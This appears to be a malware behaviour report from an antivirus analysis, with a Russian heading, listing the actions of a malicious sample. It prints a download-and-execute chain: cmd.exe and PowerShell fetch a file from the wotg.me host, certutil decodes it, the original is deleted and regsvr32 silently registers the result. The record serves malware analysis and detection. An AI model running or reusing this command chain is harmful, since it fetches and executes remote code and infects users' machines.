Техническая информация
- '<SYSTEM32>\cmd.exe' /c cd /d "%temp%" & powershell (new-object System.Net.WebClient).DownloadFile('https://wotg.me/wp-content/uploads/phlox/ad/035678-35629-74908-995348-45803.php', '%temp%\AA') & certutil -decode ...
- 'wo#g.me':443
- DNS ASK wo#g.me
- '<SYSTEM32>\cmd.exe' /c cd /d "%temp%" & powershell (new-object System.Net.WebClient).DownloadFile('https://wotg.me/wp-content/uploads/phlox/ad/035678-35629-74908-995348-45803.php', '%temp%\AA') & certutil -decode ...' (со скрытым окном)
- '<SYSTEM32>\certutil.exe' -decode "%TEMP%\AA" "%TEMP%\A.b"
- '<SYSTEM32>\cmd.exe' /c del "%TEMP%\AA"
- '<SYSTEM32>\timeout.exe' 10
- '<SYSTEM32>\regsvr32.exe' /s "%TEMP%\A.b"